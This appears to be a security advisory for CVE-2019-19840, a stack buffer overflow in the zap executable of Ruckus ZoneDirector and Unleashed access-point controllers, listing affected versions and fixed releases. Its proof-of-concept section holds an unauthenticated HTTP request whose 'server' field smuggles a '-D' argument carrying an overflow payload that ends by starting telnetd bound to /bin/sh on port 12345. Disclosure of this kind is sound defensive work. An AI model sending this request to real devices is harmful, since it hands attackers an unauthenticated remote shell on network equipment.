<--

Stack buffer overflow in zap executable

Aleph Research Advisory

Identifier

CVE-2019-19840

Severity

Critical

Product

  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7

Mitigation

  • 9.10.x: Upgrade to 9.10.2.0.84
  • 9.12.x: Upgrade to 9.12.3.0.136
  • 9.13.x: Upgrade to 10.0.1.0.90
  • 10.0.x: Upgrade to 10.0.1.0.90
  • 10.1.x: Upgrade to 10.1.2.0.275
  • 10.2.x: Upgrade to 10.2.1.0.147
  • 10.3.x: Upgrade to 10.3.1.0.21
  • 200.6 and before: Upgrade to 200.7.10.202.94
  • 200.7: Upgrade to 200.7.10.202.94

Technical Details

Stack buffer overflow/remote code execution vulnerability via a crafted unauthenticated HTTP request

zap executable contains unsafe strnpy() on its “-D” argument parser. It can be used to overflow the stack and run arbitrary code. Unintended arguments can be passed to zap by using CVE-2019-19836.

Information about the exploitation of the vulnerability can be found in our blog post or the 36C3 talk.

Proof Of Concept

Stack buffer overflow on zap executable using unauthenticated jaxa request:

POST /tools/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
Content-Length: 473

<ajax-request action='docmd' xcmd='wc' updater='system.1568118269965.3208' comp='zapd'>
<xcmd cmd='wc' comp='zapd' wcid=1 client='1.1.1.1' tool='zap-up' zap-type='udp' server='1.1.1.2 -D/tmp/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0A2p������p���5Ad6$r��d8Ad9Ae0Ae1A3Ae4Ae5Ae6A,e7AeCCCCDDDD������������f5Af6Af7,CCCC,telnetd,-l/bin/sh,-p12345' syspmtu=65500 />
</ajax-request>

Timeline

Posts

Credit

External References

  1. Ruckus Networks - Security Advisory ID 20191224 - txt
  2. Ruckus Networks - Security Advisory ID 20191224 - PDF